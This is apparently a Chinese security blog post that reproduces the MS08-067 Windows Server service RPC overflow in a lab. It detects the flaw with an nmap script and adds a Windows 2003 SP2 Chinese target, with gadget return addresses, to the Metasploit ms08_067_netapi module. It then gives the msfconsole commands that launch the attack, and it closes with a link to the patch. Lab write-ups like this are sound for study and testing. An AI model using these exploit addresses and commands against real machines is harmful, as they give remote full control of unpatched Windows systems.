MS08-067 RPC请求缓冲区溢出漏洞利用


漏洞描述

  Windows 系统上的服务器服务中存在一个远程执行代码漏洞。 该漏洞是由于服务不正确地处理特制的 RPC 请求导致的。 成功利用此漏洞的攻击者可以完全控制受影响的系统。

影响系统

  • Windows Vista
  • Windows 2000 Service
  • Windows Server 2008
  • Windows Server 2003
  • Windows XP

漏洞检测

nmap进行漏洞检测

#nmap 目标ip --script=smb-vuln-ms08-067.nse
nmap 192.168.234.129 --script=smb-vuln-ms08-067.nse

提示VULNERABLE表示漏洞存在

在这里插入图片描述

漏洞利用

漏洞利用工具为msf,我复现的系统为Windows Server 2003 SP2 中文版。但我发现msf中没有中文版 的 exp 框架。
在这里插入图片描述

添加漏洞利用代码:

#修改msf漏洞利用代码
vim /usr/share/metasploit-framework/modules/exploits/windows/smb/ms08_067_netapi.rb

添加以下内容:

 [ 'Windows 2003 SP2 Chinese (NX)',
   {
	  'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL (0x4EC3)
	  'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)
	  'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL(0xFFE4)
	  'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL
          'Scratch'   => 0x00020408,
   }
],

在这里插入图片描述

#进入msf
msfconsole

#查找漏洞框架并调用
search ms08-067
use exploit/windows/smb/ms08_067_netapi

查看系统exp框架时,可以看到我们添加的windwos 2003 SP2 Chinese

show targets

在这里插入图片描述

设置好目标ip及其他参数,即可开始攻击

set target 1
set rhost 192.168.234.129
show options

在这里插入图片描述
在这里插入图片描述

漏洞加固

微软已发布MS08-067补丁:
http://technet.microsoft.com/zh-cn/security/bulletin/ms08-067

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凝聚力安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值